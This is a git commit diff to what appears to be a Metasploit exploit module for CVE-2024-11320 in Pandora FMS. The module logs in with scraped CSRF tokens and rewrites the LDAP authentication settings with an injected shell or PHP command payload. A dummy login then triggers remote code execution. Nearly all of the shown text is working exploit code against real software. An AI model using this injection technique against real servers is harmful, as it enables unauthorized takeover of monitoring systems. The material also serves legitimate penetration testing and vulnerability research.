update2 based on comments

h00die-gr3y · h00die-gr3y · commit 2fe0b35384d7 · 2024-12-18T08:34:10.000Z
diff --git a/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb b/modules/exploits/linux/http/pandora_fms_auth_rce_cve_2024_11320.rb
@@ -20,7 +20,7 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'Pandora FMS preauth command injection leading to RCE via LDAP using default DB password',
+        'Name' => 'Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password',
         'Description' => %q{
           Pandora FMS is a monitoring solution that provides full observability for your organization's
           technology. This module exploits an command injection vulnerability in the LDAP authentication
@@ -138,13 +138,15 @@ def pandora_login(name, pwd)
         'login' => 1
       }
     })
-    return false unless res&.code == 200
+    return unless res&.code == 200
 
     # scrape <input id="hidden-csrf_code" name="csrf_code" type="hidden"  value="d3ec1cae43fba8259079038548093ba8" />
     html = res.get_html_document
     csrf_code = html.at('input[@id="hidden-csrf_code"]')
     vprint_status("csrf_code: #{csrf_code}")
-    return false if csrf_code.nil? || csrf_code.blank?
+    return if csrf_code.nil? || csrf_code.blank?
+
+    # return if csrf_code&.text.to_s.strip.empty?
 
     # second login POST request using the csrf code
     res = send_request_cgi!({
@@ -161,7 +163,7 @@ def pandora_login(name, pwd)
         'csrf_code' => csrf_code.attribute_nodes[3]
       }
     })
-    return res&.code == 200 && res.body.include?('id="welcome-icon-header"')
+    return res&.code == 200 && res.body.include?('id="welcome-icon-header"') || res.body.include?('id="welcome_panel"')
   end
 
   # CVE-2024-11320: Misconfigure LDAP with RCE payload
@@ -178,13 +180,15 @@ def configure_ldap(payload)
         'section' => 'auth'
       }
     })
-    return false unless res&.code == 200
+    return unless res&.code == 200
 
     # scrape <input id="hidden-csrf_code" name="csrf_code" type="hidden"  value="d3ec1cae43fba8259079038548093ba8" />
     html = res.get_html_document
     csrf_code = html.at('input[@id="hidden-csrf_code"]')
     vprint_status("csrf_code: #{csrf_code}")
-    return false if csrf_code.nil? || csrf_code.blank?
+    return if csrf_code.nil? || csrf_code.blank?
+
+    # return if csrf_code&.text.to_s.strip.empty?
 
     # second LDAP POST request using the csrf_code
     res = send_request_cgi({
@@ -233,12 +237,13 @@ def configure_ldap(payload)
   # CVE-2024-11320: Command Injection leading to RCE via LDAP Misconfiguration
   def execute_command(cmd, _opts = {})
     # modify php payload to trigger the RCE
-    if target['Type'] == :php_cmd
-      php_cmd = cmd.gsub(/'/, '"')
-      payload = "';php -r " + "\'#{php_cmd}\'" + ' #'
-    else
-      payload = "';" + cmd + ' #'
-    end
+    # if target['Type'] == :php_cmd
+    #  php_cmd = cmd.gsub(/'/, '"')
+    #  payload = "';php -r " + "\'#{php_cmd}\'" + ' #'
+    # else
+    #  payload = "';" + cmd + ' #'
+    # end
+    payload = "';#{target['Type'] == :php_cmd ? "php -r'#{cmd.gsub(/'/, '"')}'" : cmd} #"
 
     # misconfigure LDAP settings with RCE payload
     # clear cookies and execute dummy login to trigger the LDAP RCE payload
@@ -282,7 +287,7 @@ def check
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'keep_cookies' => true
     })
-    unless res&.code == 200 && res.body.include?('PandoraFMS.com')
+    unless res&.code == 200 && res.body.include?('PandoraFMS.com') || res.body.include?('Pandora FMS')
       return CheckCode::Safe('Target is not a Pandora FMS application.')
     end
 
